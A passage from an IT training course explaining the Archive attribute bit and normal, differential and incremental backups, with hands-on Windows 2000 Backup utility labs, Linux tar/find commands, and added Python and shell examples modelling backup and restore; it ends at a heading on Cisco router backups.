This is an oversimplified tape-swapping operation; in reality, one tape should always remain away from the server and the other backup tapes to protect against disaster, for instance, a fire in the server room. Large organizations will not swap tapes on alternate days. Rather, they will maintain entire sets of weekly tapes. If they have to swap tapes, it will be from tape sets belonging to a few weeks or even a few months ago, depending on the quality-control requirements. Eventually tapes are retired (usually after a year or so), and one of the sets representing that year makes it to a long-term storage facility somewhere for recordkeeping purposes. Common terms that you will hear regarding tape reuse are the Grandfather-Father-Son (GFS) scheme and the Tower of Hanoi scheme. To learn more about these schemes, you can read an excellent article on Exabyte's Web site, found at www.exabyte.com/support/online/documentation/whitepapers/basicbackup.pdf.

The Attribute Byte

How does the system decide what files to back up and what to ignore during the differential and incremental backup cycles? The answer lies in the Archive attribute bit. Apart from having a filename, parent directory, date created/modified, and other identifying criteria, every file on your hard drive has eight bits that signify certain things to the OS, such as if the file is Read-Only, a System file, and so forth. These eight bits are known as the Attribute byte.

The table shown in Figure 6-9 describes the bit positions of the Attribute byte.

Figure 6-9: The Attribute byte.

The purpose of the Archive bit is as follows: If this bit is ON, then the corresponding file has never been backed up (archived), or it has changed since the last backup. If this bit is OFF, then the file does not need to be backed up, as it has not changed since the last time it was archived. In other words, if you back up a file by using archiving software, then the archiving software will turn the Archive bit off. When you use some application to modify that file, the moment you modify it, its Archive bit is turned back on again.

When you perform a normal backup, all of the files that you have selected for backup will be backed up, and their respective Archive bits will be turned off.

When you perform a differential backup, the backup software looks for only those files that have their Archive bits turned back on again, because some application opened, modified, and then saved those files. The archiving software will select only those files for backing up. However, during a differential backup, the archiving software will not set the Archive bit to the off position. Why is this? Because, according to the requirements, the baseline is set by the first normal backup. After the normal backup, all files that were modified will have their Archive bit set to on and will remain on, even if the archiving software archived them, to preserve the baseline from the normal backup.

When you perform an incremental backup, the backup software looks for only those files that have their Archive bits turned back on again, because some application opened, modified, and then saved those files. The archiving software will select only those files for backing up. During an incremental backup, the archiving software does set the Archive bit to the off position. Why? Because, according to the requirements, the baseline is set for each day. Every day is the baseline for the next day.

Backup Strategies for Windows Computers

Most operating systems have some backup and restore software included with them. In Windows 2000, ntbackup.exe can be run as both a command-line tool and as a GUI. This tool enables you to back up the entire system, portions of the system, or individual files to many media formats, including your own hard drive, another hard drive, somewhere else on the network, a tape drive, or even a floppy disk. You are no longer constrained to using only a tape drive, as you were in Windows NT 4.

Current Products that Can be Used for Backup

Of course, you can purchase a third-party solution from companies such as Veritas (BackupExec), Seagate (Dantz), or Exabyte, which are typically used when higher-end backup solutions are needed. If you do, you will have to use their software to perform backups. Let's take a look at the built-in solution for backups provided for you in Windows 2000.
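Before the tasks, the Archive-bit rules and the restore requirements described under The Attribute Byte and in Figure 6-8, as an added example that is not the course's or Microsoft's code: a small model of the bit under normal, differential and incremental backups, run over a constructed week that mirrors the Weekend/Monday/Tuesday files the tasks use, and a report of which tapes a Thursday restore needs. ARCHIVE is the real FILE_ATTRIBUTE_ARCHIVE value; every file name, content and tape is an assumption of the example.

```python
"""Added example (not the course's or Microsoft's code): a model of the
Archive attribute bit and of how normal, differential and incremental backups
select files and whether they clear the bit afterwards.

ARCHIVE is the real FILE_ATTRIBUTE_ARCHIVE value (0x20, bit 5 of the Attribute
byte); the file names, their contents and the 'week' are constructed to mirror
the Backup2 folder of the tasks, and a 'tape' is just a dict of name -> content.
"""
from dataclasses import dataclass
from typing import Dict, List, Tuple

ARCHIVE = 0x20  # FILE_ATTRIBUTE_ARCHIVE


@dataclass
class File:
    content: str
    attrib: int = ARCHIVE  # a newly created file has the Archive bit on


class Volume:
    """A folder of files, as Explorer's Attributes column would show them."""

    def __init__(self) -> None:
        self.files: Dict[str, File] = {}

    def write(self, name: str, content: str) -> None:
        """Creating or modifying a file turns the Archive bit (back) on."""
        existing = self.files.get(name)
        if existing is None:
            self.files[name] = File(content)
        else:
            existing.content = content
            existing.attrib |= ARCHIVE

    def archive_on(self, name: str) -> bool:
        return bool(self.files[name].attrib & ARCHIVE)

    def snapshot(self) -> Dict[str, str]:
        return {name: f.content for name, f in self.files.items()}

    def backup(self, kind: str) -> Dict[str, str]:
        """Run one backup job and return what was written to the 'tape'."""
        if kind not in ("normal", "differential", "incremental"):
            raise ValueError(f"unknown backup type: {kind}")
        if kind == "normal":
            selected = dict(self.files)  # everything, whatever the bit says
        else:  # differential and incremental: only files with the bit on
            selected = {n: f for n, f in self.files.items() if f.attrib & ARCHIVE}
        tape = {n: f.content for n, f in selected.items()}
        # Normal and incremental jobs set a new baseline by clearing the bit;
        # a differential job leaves it on so the last normal backup stays the baseline.
        if kind != "differential":
            for f in selected.values():
                f.attrib &= ~ARCHIVE
        return tape


def tapes_needed(kind: str, tapes: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Tapes a restore needs after the last job; tapes[0] is the weekend normal."""
    if kind == "normal":
        return tapes[-1:]             # the last full backup alone
    if kind == "differential":
        return [tapes[0], tapes[-1]]  # full backup + most recent differential
    if kind == "incremental":
        return list(tapes)            # full backup + every incremental, in order
    raise ValueError(f"unknown backup type: {kind}")


def restore(tapes: List[Dict[str, str]]) -> Dict[str, str]:
    """Apply tapes oldest first; later tapes overwrite ('Always Replace')."""
    state: Dict[str, str] = {}
    for tape in tapes:
        state.update(tape)
    return state


def simulate_week(kind: str) -> Tuple[Volume, List[Dict[str, str]]]:
    """Weekend normal backup, then one daily job of `kind` after each day's
    new file; returns the volume and the tapes in the order they were made."""
    vol = Volume()
    vol.write("Weekend.txt", "Last week's work")
    tapes = [vol.backup("normal")]
    for day in ("Monday", "Tuesday", "Wednesday"):
        vol.write(f"{day}.txt", f"{day}'s work")
        tapes.append(vol.backup(kind))
    return vol, tapes


if __name__ == "__main__":
    for kind in ("normal", "differential", "incremental"):
        vol, tapes = simulate_week(kind)
        needed = tapes_needed(kind, tapes)
        print(f"{kind:>12}: daily tapes {[sorted(t) for t in tapes[1:]]}; "
              f"Thursday restore needs {len(needed)} tape(s); "
              f"complete={restore(needed) == vol.snapshot()}")
```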

TASK 6D-1
Creating a Folder Structure

Objective: To create files and folders to be used in testing the backup solutions provided in the Windows 2000 OS.

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. Open Windows Explorer.
2. Select your boot partition.
3. Create a folder called BackReco.
4. In this folder, create three folders named Normal, Differential, and Incremental.
5. In the Normal folder, create two folders named Backup1 and Restore1.
6. In the Differential folder, create two folders named Backup2 and Restore2.
7. In the Incremental folder, create two folders named Backup3 and Restore3.
8. Navigate to the BackReco\Normal\Backup1 folder.
9. Right-click anywhere within the Explorer window, and choose New→Text Document. Rename the file normal.txt.
10. Observe that the file was created with the Archive attribute bit set.
11. Double-click the file, enter any text that you like, and save and close the file. Record the file modification time here: Actual times will vary for each class.
12. Leave this Explorer window open.

Initiating the Backup Process

In the following task, you will perform the steps necessary to back up the file that you just created. To start, you will initiate a normal backup.

TASK 6D-2
Initiating a Normal Backup

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Explorer is running.

1. From the Start menu, choose Programs→Accessories→System Tools→Backup to start the Backup utility. You might want to create a shortcut to this utility on your Desktop so that you don't have to go through the menus in future tasks.
2. Select the Backup tab. Expand your boot partition, and navigate to the BackReco\Normal\Backup1 folder.
3. In the right pane, check the file name of the file you just created.
4. Towards the bottom of this window, where it says Backup Destination (File) and Backup Media Or File Name: a:\backup.bkf, click the Browse button, and navigate to the BackReco\Normal\Restore1 folder.
5. Name your backup file abc, and click Open.
6. Towards the right side of the backup window, click Start Backup.
7. Click the Advanced button. Verify that the Backup Type is set to Normal. Click OK.
8. Click the Schedule button. The first time you click this button, you will be prompted to save your settings. Do so with any name you like, and enter your logon credentials if you are prompted for them. The Scheduled Job Options dialog box is displayed.
9. Click Properties. If you want to schedule this job for later as a one-off job or for repetitive backups on a daily, weekly, or monthly schedule, this is where you enter the options.
10. Click Cancel twice.
11. Click Start Backup. A few seconds later your backup should be complete.
12. Click Close, and minimize the Backup utility.

Viewing the Results of the Backup Process

Now that you have performed a normal backup, in the following task, you will check out the state of the Archive bit.

TASK 6D-3
Viewing the State of the Archive Attribute Bit

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer and the Backup utility are running.

1. Switch to the Explorer window.
2. Verify that the file does not have the Archive attribute bit set.
3. Double-click the file to open it in Notepad.
4. Enter any extra text you like.
5. Save and close the file, and switch back to the Explorer window.
6. Observe that the Archive bit is now back on again. This means that the file has changed since the last backup and needs to be archived again. Also, observe that the file modification time has changed.

Restoring from a Backup

Let's look at a scenario where we consider the last edit of the file to be a wrong edit; perhaps somebody tampered with the file or didn't know what they were doing, so you now have to restore the original file from backup.

TASK 6D-4
Restoring a File from Normal Backup

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer and the Backup utility are running.

1. Switch to the Backup utility.
2. Select the Restore tab. If the Restore tab contains text that indicates that existing files will not be replaced, choose Tools→Options, select Always Replace The File On My Computer, and click OK.
3. Expand the elements in the left pane until you can see your text file in the right pane, and then check your text file.
4. Click the Start Restore button. If you are prompted to confirm the restore, click OK.
5. In the Enter Backup File Name text box, verify the path to your backup file, and click OK.
6. Give Backup a few seconds to do its job. Your file should be restored for you. Click Close and minimize Backup.
7. Switch to the Explorer window and observe the file modification time. It has reverted to the time that you recorded when you first backed up the file.
8. Open your text file in Notepad.
9. Verify that the changes you had made are now gone and that the file is in its original state.
10. Close Notepad.

Understanding Differential Backup

In the following set of tasks, you will carefully construct and step through the requirements to initiate a differential backup and restore of a set of files. You will create separate backup files to mimic each day of backup. You will then mimic an accident by deleting all of the files in your folder. Finally, you will use the Restore feature to retrieve the deleted files.

TASK 6D-5
Preparing to Start a Differential Backup Sequence

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer and the Backup utility are running.

1. In Explorer, navigate to the BackReco\Differential\Backup2 folder.
2. Expand your screen so that you can see all the columns. Add the Attributes column if it isn't displayed.
3. Right-click in the Explorer window, and choose New→Text Document. Rename this file Weekend.txt.
4. As before, observe that the file was created with the Archive attribute bit set.
5. Record the file modification time: Modification times will vary.
6. Double-click the file, enter Last week's work, and then save and close the file.
7. Leave this Explorer window open.

Backing Up Your Weekend's Work

In the following task, you will perform the steps necessary to back up your weekend's work.

TASK 6D-6
Initiating a Differential Backup Sequence

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer and the Backup utility are running.

1. Switch to the Backup utility, and select the Backup tab.
2. Choose Tools→Options.
3. Under Default Backup Type, verify that Normal is selected, and click OK. When you are going to be performing a differential backup, you first perform a Normal backup.
4. In the left pane, navigate to the BackReco\Differential\Backup2 folder.
5. Check the folder.
6. Click the Browse button to specify the location of the backup media or file name.
7. Navigate to the BackReco\Differential\Restore2 folder.
8. For the file name, enter Weekend_normal, and click Open.
9. Click Start Backup, then click Start Backup again.
10. Wait a few seconds. When the backup is complete, click Close.
11. Close the Backup utility.

Adding Data During the Week

In the following task, you will proceed to add to the work that you did last week, after backing up your weekend's work.

TASK 6D-7
Creating Additional Data

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer is running.

1. Switch to Windows Explorer and select the BackReco\Differential\Backup2 folder.
2. As you had seen earlier, observe that the file Weekend.txt no longer has the Archive attribute bit set.
3. Right-click in the Explorer window and choose New→Text Document.
4. Rename this file Monday.txt. As before, observe that the file was created with the Archive attribute bit set.
5. Record the file modification time here: Actual times will vary for each class.
6. Double-click the file, enter Monday's work, and then save and close the file.
7. Leave this Explorer window open.

Backing Up Data During the Week

In the following task, you will perform the steps necessary to differentially back up the work you did after backing up your weekend's work.

TASK 6D-8
Continuing the Differential Backup Sequence

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer is running.

1. Start the Backup utility.
2. Select the Backup tab.
3. Choose Tools→Options.
4. Under Default Backup Type, select Differential, and click OK.
5. In the left pane, navigate to the BackReco\Differential\Backup2 folder.
6. Check the folder.
7. Click the Browse button to specify the location of the backup media or file name.
8. Navigate to the BackReco\Differential\Restore2 folder.
9. For the filename, enter Mon_diff, and click Open. This now represents the follow-up to the normal backup you carried out earlier.
10. Click Start Backup, and then click Start Backup again.
11. When the backup is complete, click Close.
12. Minimize the Backup utility.

Adding More Data

In the following task, you will perform the steps necessary to add more work after performing your first differential backup.

TASK 6D-9
Adding Data After a Differential Backup

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer and the Backup utility are running.

1. Switch to Windows Explorer, and select the BackReco\Differential\Backup2 folder.
2. Observe that the Archive attribute bit for the file Monday.txt is still on. When you chose to do a differential backup, the file was backed up, but the Archive attribute bit was not touched.
3. Create a new text document named Tuesday.txt.
4. As before, observe that the file was created with the Archive attribute bit set. Record the file modification time:
   Modification times will vary.
5. Double-click the file, enter Tuesday's work, and then save and close the file.
6. Leave this Explorer window open.

Backing Up More Data

In the following task, you will perform the steps necessary to back up the work you did after backing up your previous day's work.

TASK 6D-10
Differentially Backing Up More Data

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer and the Backup utility are running.

1. Switch to the Backup utility.
2. Choose Tools→Options.
3. Under Default Backup Type, verify that Differential is selected, and click OK.
4. In the left pane, navigate to the BackReco\Differential\Backup2 folder, and check the folder.
5. Browse to specify the BackReco\Differential\Restore2 folder as the location of the backup media or file name.
6. For the file name, enter Tue_diff, and click Open.
7. Start the backup (click Start Backup, and then click Start Backup again).
8. When the backup is complete, click Close.
9. Minimize the Backup utility.

Accidentally Deleting Data

In the following task, you will mimic an accidental destruction of all of the work you did this week, as well as last week's work.

TASK 6D-11
Destroying Backed-up Data

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer and the Backup utility are running.

1. Switch to Windows Explorer, and select the BackReco\Differential\Backup2 folder.
2. Observe that the Archive attribute bit for the file Tuesday.txt is still on.
3. Delete all of the files in the Backup2 folder.
4. Leave this Explorer window open.

Restoring Data from a Differential Backup

In the following task, you will use your backup files to restore all of the work you did this week and last week.

TASK 6D-12
Restoring Files from a Differential Backup

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer and the Backup utility are running.

1. Switch to the Backup utility.
2. Select the Restore tab.
3. If you see some Media files, select all of them in the right pane, and choose Tools→Media Tools→Delete Catalog.
4. Choose Tools→Catalog A Backup File.
5. Browse to the BackReco\Differential\Restore2 folder, and select Weekend_normal.bkf.
6. Click Open, and then click OK.
7. In the left pane, expand File (the one with the CD-ROM icon) and the full path under Media Created On File (the one with the floppy disk icon) below it. If a pop-up is displayed, verify that the file listed is the Weekend_normal.bkf file, and click OK.
8. Check the Backup2 folder.
9. Click the Start Restore button.
10. Click OK twice.
11. When the restore is complete, click Close.
12. Minimize the Backup utility.
13. Switch to Windows Explorer, and select the BackReco\Differential\Backup2 folder.
14. Observe that the Weekend.txt file is restored. But you need to have this week's work, too!
15. Switch to the Backup utility.
16. On the Restore tab, select the Media file, and choose Tools→Media Tools→Delete Catalog.
17. Choose Tools→Catalog A Backup File.
18. Browse to the BackReco\Differential\Restore2 folder, and select Tue_diff.bkf.
19. In the left pane, expand File and the full path under the Media Created On File below it. Each time that you are prompted for the location of the file, verify that the file listed is the Tue_diff.bkf file, and click OK.
20. Check the Backup2 folder.
21. Start the restore.
22. Click OK twice.
23. When the restore is complete, click Close.
24. Minimize the Backup utility.
25. Switch to Windows Explorer, and select the BackReco\Differential\Backup2 folder.
26. Observe that both the Monday.txt and Tuesday.txt files have been restored. Because each differential set contains everything changed since the normal backup, Mon_diff.bkf was not needed for the restore.

Optional Tasks

Understanding Incremental Backup

The previous set of tasks was designed to walk you through the process of backing up and restoring a set of files by using the differential backup method. The set of tasks that follow are optional and are designed to help you understand the steps required to achieve the same objective, this time by using the incremental backup method. Because we are using very small files to illustrate the process, it may seem that there's not much difference between the two in terms of time taken to back up and restore. In the real world, when faced with the choice of backing up large amounts of data every day, there can sometimes be an order of magnitude of difference between adopting one method over the other.

In the following set of tasks, you will carefully construct and step through the requirements to initiate an incremental backup and restore of a set of files. You will create separate backup files to mimic each day of backup. You will then mimic the accidental destruction of data by corrupting a file and by deleting all of the files in your folder. You will then use the Restore feature to retrieve the necessary files.

OPTIONAL TASK 6D-13
Preparing to Start an Incremental Backup Sequence

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer and the Backup utility are running.

1. Navigate to the BackReco\Incremental\Backup3 folder.
2. Expand your screen so that you can see all of the columns.
3. Create a new text document named Weekend.txt.
4. As before, observe that the file was created with the Archive attribute bit set. Record the file modification time:
   Modification times will vary.
5. Double-click the file, enter Last week's work, and then save and close the file.
6. Leave this Explorer window open.

Backing up Your Weekend's Work

In the following task, you will perform the steps necessary to back up your weekend's work.

OPTIONAL TASK 6D-14
Initiating an Incremental Backup Sequence

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer and the Backup utility are running.

1. Switch to the Backup utility, and select the Backup tab.
2. Choose Tools→Options.
3. Under Default Backup Type, select Normal, and click OK. When you are going to be performing an incremental backup, you first perform a normal backup.
4. In the left pane, navigate to the BackReco\Incremental\Backup3 folder.
5. Check the folder.
6. Browse to specify BackReco\Incremental\Restore3 as the location of the backup media or file name.
7. For the file name, enter Weekend_normal, and click Open.
8. Start the backup.
9. When the backup is complete, click Close.
10. Minimize the Backup utility.

Adding Data During the Week

In the following task, you will proceed to add to the work you did last week.

OPTIONAL TASK 6D-15
Creating Additional Data

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer and the Backup utility are running.

1. Switch to Windows Explorer, and select the BackReco\Incremental\Backup3 folder.
2. As you saw earlier, observe that the file Weekend.txt no longer has the Archive attribute bit set.
3. Create a new text document named Monday.txt.
4. As before, observe that the file was created with the Archive attribute bit set. Record the file modification time:
   Modification times will vary.
5. Double-click the file, enter Monday's work, and then save and close the file.
6. Leave this Explorer window open.

Backing Up Data During the Week

In the following task, you will perform the steps necessary to incrementally back up the work you did after backing up your weekend's work.

OPTIONAL TASK 6D-16
Continuing the Incremental Backup Sequence

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer and the Backup utility are running.

1. Switch to the Backup utility, and verify that the Backup tab is active.
2. Choose Tools→Options.
3. Under Default Backup Type, select Incremental, and click OK.
4. In the left pane, navigate to the BackReco\Incremental\Backup3 folder.
5. Check the folder.
6. Browse to specify BackReco\Incremental\Restore3 as the location of the backup media or file name.
7. For the file name, enter Mon_incr, and click Open. This now represents the follow-up to the normal backup you carried out earlier.
8. Start the backup.
9. When the backup is complete, click Close.
10. Minimize the Backup utility.

Adding More Data

In the following task, you will perform the steps necessary to add more work after performing your first incremental backup.

OPTIONAL TASK 6D-17
Adding Data After an Incremental Backup

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer and the Backup utility are running.

1. Switch to Windows Explorer, and select the BackReco\Incremental\Backup3 folder.
2. Observe that the Archive attribute bit for the file Monday.txt is now off. When you chose to do an incremental backup, the file was backed up and the Archive attribute bit was cleared (set to 0).
3. Create a new text document named Tuesday.txt.
4. As before, observe that the file was created with the Archive attribute bit set. Record the file modification time:
   Modification times will vary.
5. Double-click the file, enter Tuesday's work, then save and close the file.
6. Leave this Explorer window open.

Backing Up More Data

In the following task, you will perform the steps necessary to incrementally back up the work you did after backing up your previous day's work.

OPTIONAL TASK 6D-18
Incrementally Backing Up More Data

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer and the Backup utility are running.

1. Switch to the Backup utility.
2. Choose Tools→Options, verify that the Incremental backup type is selected, and click OK.
3. In the left pane, navigate to the BackReco\Incremental\Backup3 folder.
4. Check the folder.
5. Browse to specify BackReco\Incremental\Restore3 as the location of the backup media or file name.
6. For the file name, enter Tue_incr, and click Open.
7. Start the backup.
8. When the backup is complete, click Close.
9. Minimize the Backup utility.

Accidentally Corrupting Data

In the following task, you will simulate a situation where someone trashes a file by replacing its contents with unwanted text.

OPTIONAL TASK 6D-19
Corrupting Backed-up Data

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer and the Backup utility are running.

1. Switch to Windows Explorer, and select the BackReco\Incremental\Backup3 folder.
2. Observe that the Archive attribute bit for the file Tuesday.txt is off.
3. Open Monday.txt.
4. Delete the existing text.
5. Add some gibberish, and save and close the file.
6. Observe that the Archive bit is back on again for Monday.txt.
7. Leave this Explorer window open.

Restoring Data from an Incremental Backup

In the following task, you will use your backup files to restore just the work that was messed up, not all of the data.

OPTIONAL TASK 6D-20
Restoring an Incrementally Backed-up File

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer and the Backup utility are running.

1. Switch to the Backup utility.
2. Select the Restore tab.
3. If you see some media files, delete the catalog.
4. Choose Tools→Catalog A Backup File.
5. Browse to and open \BackReco\Incremental\Restore3\Mon_incr.bkf.
6. In the left pane, expand File and the full path under the Media Created On File below it (verifying the file location as you expand).
7. Check the Backup3 folder.
8. Start the restore.
9. Click OK twice.
10. When the restore is complete, click Close.
11. Minimize the Backup utility.
12. Switch to Windows Explorer, and select the BackReco\Incremental\Backup3 folder.
13. Open Monday.txt, and verify that it has been properly restored.
14. Close Notepad.

Performing an Incomplete Restore from Incremental Backup

In the following task, you will mimic the accidental destruction of all the work you did this week and last week. You will then incorrectly try to restore all the work you lost. This will help you understand the right way of implementing a restore from incremental backup.

OPTIONAL TASK 6D-21
Incompletely Restoring from Incremental Backup

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer and the Backup utility are running.

1. Highlight all three text files in the Backup3 folder, and delete them.
2. Leave this Explorer window open.
3. Switch to the Backup utility.
4. On the Restore tab, if you see some media files, delete the catalog.
5. Choose Tools→Catalog A Backup File.
6. Browse to and open \BackReco\Incremental\Restore3\Weekend_normal.bkf.
7. In the left pane, expand File and the full path under the Media Created On File below it.
8. Check the Backup3 folder.
9. Start the restore.
10. Click OK twice.
11. When the restore is complete, click Close.
12. Minimize the Backup utility.
13. Switch to Windows Explorer, and select the BackReco\Incremental\Backup3 folder.
14. Verify that the Weekend.txt file has been restored.
15. Switch to the Backup utility.
16. On the Restore tab, delete the existing media catalog.
17. Catalog the Tue_incr.bkf backup file.
18. In the left pane, expand File and the full path under the Media Created On File below it.
19. Check the Backup3 folder.
20. Start the restore.
21. Click OK twice.
22. When the restore is complete, click Close.
23. Minimize the Backup utility.
24. Switch to Windows Explorer, and select the BackReco\Incremental\Backup3 folder.
25. Observe that only the Tuesday.txt file was restored. The Monday.txt file is still missing.

Analyzing the Incremental Restore

What happened just now? Each incremental archive contains only the files that changed since the previous backup (normal or incremental), because the Archive bit is cleared as each file is backed up. So when you restore from an incremental backup set, in order to fully restore all of the files, you must start with the first (normal) backup and then proceed to restore from every subsequent incremental archive, in order. Skipping Mon_incr.bkf is what left Monday.txt missing. Contrast this with the differential sequence, where the normal backup plus the latest differential archive was enough.

OPTIONAL TASK 6D-22
Completely Restoring from Incremental Backup

Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Windows Explorer and the Backup utility are running.

1. Highlight the two text files in this folder, and delete them.
2. Leave this Explorer window open.
3. Switch to the Backup utility.
4. Delete the media catalog, catalog the Weekend_normal.bkf file, and restore from that file.
5. In Explorer, verify that the Weekend.txt file has been restored.
6. In the Backup utility, delete the media catalog, catalog the Mon_incr.bkf backup file, and restore from that file.
7. In Explorer, verify that the Monday.txt file has been restored.
8. In the Backup utility, delete the media catalog, catalog the Tue_incr.bkf backup file, and restore from that file.
9. Close the Backup utility.
10. In Explorer, verify that the Tuesday.txt file has been restored. You have now correctly restored all of the files from the incremental backup set.
11. Close Explorer.

Backup Options for Linux Computers

Strategies for backing up in Linux are the same as with any other OS; you still choose between normal, differential, or incremental backups. Most administrators typically would still use home-grown solutions based on tar or cpio to back up their files, as these facilities are built in to the OS.

Some third-party and commercial utilities available for Linux include:

Lone Tar (from www.cactus.com).
Afbackup (from http://sourceforge.net/projects/afbackup).
Arkeia (from www.arkeia.com), an enterprise backup system. Incidentally, while Arkeia for the enterprise has a price tag to it, Arkeia-Lite for one Linux server with two clients is free.
Amanda (from www.amanda.org), a comprehensive network backup system. The Advanced Maryland Automatic Network Disk Archiver, as the name implies, was developed at the University of Maryland. AMANDA can be used as a network backup system. It enables a LAN administrator to set up a server as a master backup server. Using this server, the administrator can back up multiple hosts to a single large-capacity tape drive. AMANDA uses the native dump and/or GNU tar facilities to back up many workstations on the network even if they run different versions of Unix or Linux. The newer versions of AMANDA can also use Samba to back up Windows workstations.

Current Products that Can be Used for Backup

The GNU tar utility (the name is an abbreviation of Tape Archive) is the traditional way Unix machines create archives on tape as a backup and recovery mechanism. When you are backing up to a device, you have to specify the device by name, such as:

Floppy disk: /dev/fd0
SCSI tape drive: /dev/st0

Let's say you wanted to back up some files (file1, file2, and file3) to a floppy disk. If the files are larger than a single floppy, then you want the archiving software to span the archive across multiple floppies. In this case, you would use the tar command as follows:

tar -cMf /dev/fd0 file1 file2 file3

If you read the man pages for tar, you will see that the switches work as follows:

-c = create
-M = multi-volume (span the archive across more than one medium)
-f = archive (name of the archive file or device; it must be the last switch in a cluster, because the next argument is taken as its value)
-z = compress the archive with gzip

Note that -z cannot be combined with -M: GNU tar refuses to create a compressed multi-volume archive, and a cluster such as -cfzM would make tar treat "zM" as the archive name and /dev/fd0 as a file to be archived. Compress single-volume archives only.

If you just wanted to create an archive of two files (abc.txt and def.txt) to a single file called abcdef.tar on your hard drive, you could, for example, use the following command:

tar -cf abcdef.tar abc.txt def.txt

Another useful command to know is the find command. This command, with the appropriate switches, can be used to find files that were created or modified in the last day, as shown here:

find -mtime -1 -type f -print

If you were to run the tar routine and, instead of specifying individual files, you enclosed this find command in single back quotes, the result of the find command would be tarred. (The single back quote on a U.S.-International keyboard is to the left of the numeral 1. The single quote that's to the right of the semicolon is not the one we want.)

So, if you were scheduling an incremental backup every day, you would, on the first day, tar all the files you wanted to archive (maybe to a tape); then, on subsequent days, you would tell tar to archive only those files that changed on that day.
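The following script is an added example, not part of the course text, and goes one step beyond the find/tar one-liner above. Selecting files with -mtime -1 gives a sliding 24-hour window, which is not the same as "changed since the last backup": a file saved 25 hours ago is missed, and a file edited twice in one day is archived twice. The script keeps a stamp file as the reference point instead, so each incremental run archives exactly what changed since the previous run, and it records the new stamp before scanning so a file changed during the backup is caught next time rather than lost. The directory name tartest and the archive and stamp paths are illustrative; GNU tar's --listed-incremental option does the same job more completely, but this version runs with any POSIX find and tar.

```sh
#!/bin/sh
# Added example, not from the course text: an incremental scheme built on
# find and tar with a stamp file as the reference point, replacing the
# course's sliding "-mtime -1" window. ARCHIVE and STAMP must be absolute
# paths outside the directory being backed up, or they would be archived too.
set -eu

archive_count() {               # number of members in archive $1
    tar -tf "$1" | wc -l | tr -d ' '
}

# backup_full DIR ARCHIVE : level-0 archive of every regular file under DIR
# (paths relative to DIR) plus ARCHIVE.stamp marking when it was taken. The
# stamp is written before find runs, so anything modified from that instant
# on counts as "newer" for the next incremental. Prints the member count.
backup_full() {
    dir=$1; archive=$2
    : > "$archive.stamp"
    (cd "$dir" && find . -type f -print > "$archive.list" && tar -cf "$archive" -T "$archive.list")
    archive_count "$archive"
}

# backup_incremental DIR ARCHIVE STAMP : archive only files modified after
# STAMP, then advance STAMP. The new stamp is taken before find runs, so a
# file changed while the backup is in progress is caught next time, not lost.
# Prints the member count (0 when nothing changed; no archive is written).
backup_incremental() {
    dir=$1; archive=$2; stamp=$3
    : > "$stamp.next"
    (cd "$dir" && find . -type f -newer "$stamp" -print > "$archive.list")
    if [ -s "$archive.list" ]; then
        (cd "$dir" && tar -cf "$archive" -T "$archive.list")
        archive_count "$archive"
    else
        echo 0
    fi
    mv "$stamp.next" "$stamp"
}

files_last_day() {              # the course's selection, kept for comparison
    (cd "$1" && find . -mtime -1 -type f -print | sort)
}

demo() {
    w=$(mktemp -d); mkdir "$w/tartest"             # constructed sample data
    printf 'abc\n' > "$w/tartest/abc.txt"
    printf 'def\n' > "$w/tartest/def.txt"
    touch -t 200301010000 "$w/tartest/old.txt"    # backdated: outside the 24h window
    echo "-mtime -1 selects:   $(files_last_day "$w/tartest" | tr '\n' ' ')"
    echo "full backup members: $(backup_full "$w/tartest" "$w/week.tar")"
    sleep 1                                         # coarse timestamps need a new second
    printf 'mon\n' > "$w/tartest/mon.txt"
    echo "incremental members: $(backup_incremental "$w/tartest" "$w/mon.tar" "$w/week.tar.stamp")"
    echo "incremental holds:   $(tar -tf "$w/mon.tar" | tr '\n' ' ')"
    rm -rf "$w"
}
demo
```

The demo shows the difference directly: -mtime -1 lists only abc.txt and def.txt, the full backup captures all three files including the backdated old.txt, and the incremental run captures just mon.txt. As with the Windows tasks, restoring from this scheme means extracting the full archive and then every incremental archive in order. File names containing newlines would break the -T list; use a null-separated list (find -print0 with GNU tar's --null) if that is a concern.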

TASK 6D-23
Using the tar Command for Incremental Backups

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. Log in to Linux as root, and open a Terminal Window.
2. Create a directory called tartest, and then change to that directory.
3. Enter touch abc.txt to create a file.
4. Enter touch def.txt to create another file.
5. Enter find -mtime -1 -type f -print to find files that have been created or changed within the last day. You should be shown a list of the two files you just created.
   Make sure that you type the numeral 1 (not the letter l) for the second argument.
6. Enter tar -cf abcdef.tar `find -mtime -1 -type f -print` to tar the results of the find command. Remember that both of the quotes need to be back single quotes. A tar file called abcdef.tar will be created for you (it is not compressed, because -z was not given).
7. Verify that the new tar file was created, and close the Terminal Window.

Backup Strategies for Cisco Routers

